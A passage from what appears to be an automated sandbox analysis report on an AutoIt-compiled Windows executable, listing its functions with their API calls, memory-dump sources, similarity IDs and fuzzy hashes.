          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove_strncmp
          • String ID: U$\
          • API String ID: 2666721431-100911408
          • Opcode ID: bca37a2e2df9faf81ee47e50d6a8ba35c6bc25e3cf44e0f57f6bf66468c995de
          • Instruction ID: ca2a4c7e4030c805c557b258d754bbf31f7a5aa6824436d4ec32d729d7f67177
          • Opcode Fuzzy Hash: bca37a2e2df9faf81ee47e50d6a8ba35c6bc25e3cf44e0f57f6bf66468c995de
          • Instruction Fuzzy Hash: F1716E70A0024ADFDF29CFA9C9946AEFBF2EF89304F24816DD462A7345D7309946CB51
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01196362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 0113F260: _wcslen.LIBCMT ref: 0113F262
            • Part of subcall function 0113F260: _wcscpy.LIBCMT ref: 0113F282
          • __wcsnicmp.LIBCMT ref: 011963D5
          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0119647B
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Connection__wcsnicmp_wcscpy_wcslen
          • String ID: LPT
          • API String ID: 3035604524-1350329615
          • Opcode ID: bb3a1cb21abd6809f4762a92d713e9bf1d406ceddbf2acb43222f97cf9121abe
          • Instruction ID: e0dd44f612afe01f688f7ee94ec0cece7cfc0eb545dde4263d9a6791f77dff10
          • Opcode Fuzzy Hash: bb3a1cb21abd6809f4762a92d713e9bf1d406ceddbf2acb43222f97cf9121abe
          • Instruction Fuzzy Hash: 5C51B0B5A00205ABDF18EFA8CC80FAEB7B5FB84704F118459E5259B344D774EA45CBA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0117D34B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID: \
          • API String ID: 4104443479-2967466578
          • Opcode ID: 7d45c08e01fa7e59e557f8fc50fc37862dd91f04bdebfe81c07ca81faf8fbc07
          • Instruction ID: d896dbab8f1ea8c822ef9856ab0d45b635988e07df719f093bf87af0309e3049
          • Opcode Fuzzy Hash: 7d45c08e01fa7e59e557f8fc50fc37862dd91f04bdebfe81c07ca81faf8fbc07
          • Instruction Fuzzy Hash: AC51A270E0024A8FDF2DCFADD8906ADBBB2AF85314F28426AD56597391D3315A46CB41
          Uniqueness

          Uniqueness Score: -1.00%

          Function 011782B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0117839F
          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 011783B8
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend
          • String ID: '
          • API String ID: 3850602802-1997036262
          • Opcode ID: 3c83de157a3c3cf1027e122b42a7436dba23899168139ef7dd6c1295184ec720
          • Instruction ID: e1e2a68743e876d61b238dc334fe21b5e6fc265718abb8540cdbc5937112351e
          • Opcode Fuzzy Hash: 3c83de157a3c3cf1027e122b42a7436dba23899168139ef7dd6c1295184ec720
          • Instruction Fuzzy Hash: F4417A75A042099FCB18CF9CD884BEEB7B5FF88310F14816AE919AB345D370A945CFA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113F540, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
          Download Yara Rule
          APIs
          • _strlen.LIBCMT ref: 0113F548
            • Part of subcall function 0113F570: _memmove.LIBCMT ref: 0113F5B9
            • Part of subcall function 0113F570: _memmove.LIBCMT ref: 0113F5D3
          • _sprintf.LIBCMT ref: 0113F69E
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove$_sprintf_strlen
          • String ID: %02X
          • API String ID: 1921645428-436463671
          • Opcode ID: 468d2ae7a35cde02a3b82b9fbe88866538124a343acf4c3fdf610e81a96fecfa
          • Instruction ID: 5434570cbf0e72034c910877bbe7453d2a5eb9fb8c81ce6509344b33aed82e61
          • Opcode Fuzzy Hash: 468d2ae7a35cde02a3b82b9fbe88866538124a343acf4c3fdf610e81a96fecfa
          • Instruction Fuzzy Hash: DE210A72F0022677D71CA679CC81B9BB39CEFA1504F14002AF605D7194EB64E90683A6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01181297, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
          Download Yara Rule
          APIs
          • GetWindowTextLengthW.USER32(00000000), ref: 011812C0
          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 011812D0
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: LengthMessageSendTextWindow
          • String ID: edit
          • API String ID: 2978978980-2167791130
          • Opcode ID: e1acf2b9ac5c31999dfb64b501b0892b76dbc8867f25880701e621e7330bd545
          • Instruction ID: dc2b382a807042c79a2f96fc8313e85d29e0479e8e9344c045dd0cf0e784f35f
          • Opcode Fuzzy Hash: e1acf2b9ac5c31999dfb64b501b0892b76dbc8867f25880701e621e7330bd545
          • Instruction Fuzzy Hash: 2C2178B2514205AFDB289E6DD880EEB33ADEB89334F108315F964D72C1C775D8818F60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0113F570, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memmove
          • String ID: ?T
          • API String ID: 4104443479-3504941901
          • Opcode ID: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
          • Instruction ID: a2ff595068ddda6bc1f9ff79dbe978fadffab2f5deda19ccfe1579f5bb19dbd7
          • Opcode Fuzzy Hash: 6ed6293c3fc55fbf7b4a0a22f5e05766082ab94377e9ba98b933d083143e9cd3
          • Instruction Fuzzy Hash: 0B11D3B291021AAFC70CDF64D8C09AE77A8EB58248B544169EA06C7645E731FE16C7E1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0119907F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55windowCOMMON
          Download Yara Rule
          APIs
            • Part of subcall function 01131D10: _wcslen.LIBCMT ref: 01131D11
            • Part of subcall function 01131D10: _memmove.LIBCMT ref: 01131D57
          • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 011990EB
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend_memmove_wcslen
          • String ID: ComboBox$ListBox
          • API String ID: 547829025-1403004172
          • Opcode ID: 6e75572ad9aef5ff98160a3aa548c04385d30788f7bdadfced516b9f1ec07ac4
          • Instruction ID: 179154a9672da08f380392760f216996cd465333386064d571686d9e16a140ea
          • Opcode Fuzzy Hash: 6e75572ad9aef5ff98160a3aa548c04385d30788f7bdadfced516b9f1ec07ac4
          • Instruction Fuzzy Hash: 0A01F93171011D37CF18BA6D9C48BDFBB5C9F96324F04805BEA2897246C7319944C3E1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01162175, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
          Download Yara Rule
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __fread_nolock_memmove
          • String ID: EA06
          • API String ID: 1988441806-3962188686
          • Opcode ID: 94c5b0d775c99771b20b68b61bbbfba063940b520703d2bf22d88e680afec495
          • Instruction ID: 53fa8d0751eee85d05855b5d6fd8aebfdcbbcfa53e522549d320b971da4930a1
          • Opcode Fuzzy Hash: 94c5b0d775c99771b20b68b61bbbfba063940b520703d2bf22d88e680afec495
          • Instruction Fuzzy Hash: C4014931D04218ABCB1CDB998C52BEEBBF89F15601F04859DF59692281D674A718C7A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 01186069, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
          Download Yara Rule
          APIs
          • SendMessageW.USER32(?,00001001,00000000,?), ref: 01186075
            • Part of subcall function 011414F7: _malloc.LIBCMT ref: 01141511
          • wsprintfW.USER32 ref: 011860A1
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: MessageSend_mallocwsprintf
          • String ID: %d/%02d/%02d
          • API String ID: 1262938277-328681919
          • Opcode ID: cf737c37c3113216e8a523407bdb9a80fd5b90c8c33955493a996a1a82476a31
          • Instruction ID: 9f4ceb1d92a28255ec9f2ff7b91b0929ce3f2ec0decb85707939646c8c884044
          • Opcode Fuzzy Hash: cf737c37c3113216e8a523407bdb9a80fd5b90c8c33955493a996a1a82476a31
          • Instruction Fuzzy Hash: A7F0823274022866D7249BD9AC86FFEB3A8DB59B53F004167FA04E9180E7694854C7F1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0116704A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
          Download Yara Rule
          APIs
          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01167058
            • Part of subcall function 011417FA: _doexit.LIBCMT ref: 01141806
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.334640604.0000000001131000.00000020.00020000.sdmp, Offset: 01130000, based on PE: true
          • Associated: 00000004.00000002.334632678.0000000001130000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334722803.00000000011B2000.00000002.00020000.sdmp Download File
          • Associated: 00000004.00000002.334735646.00000000011C0000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334741902.00000000011C1000.00000008.00020000.sdmp Download File
          • Associated: 00000004.00000002.334748625.00000000011C2000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334756098.00000000011D7000.00000004.00020000.sdmp Download File
          • Associated: 00000004.00000002.334762568.00000000011DB000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Message_doexit
          • String ID: AutoIt$Error allocating memory.
          • API String ID: 1993061046-4017498283
          • Opcode ID: b3e3d48954fd5c2210907f5d4467b3ad09642432059aaa5752ebf82551ae4e1d
          • Instruction ID: 0f42e5850fe6f17a98b93f230ecc3d64d2196ee688441b16b168af14a92000b8
          • Opcode Fuzzy Hash: b3e3d48954fd5c2210907f5d4467b3ad09642432059aaa5752ebf82551ae4e1d
          • Instruction Fuzzy Hash: F5B092303C832536E11C26A20D9BFC620000718F0AF004408F32A289C306D5249002B1
          Uniqueness

          Uniqueness Score: -1.00%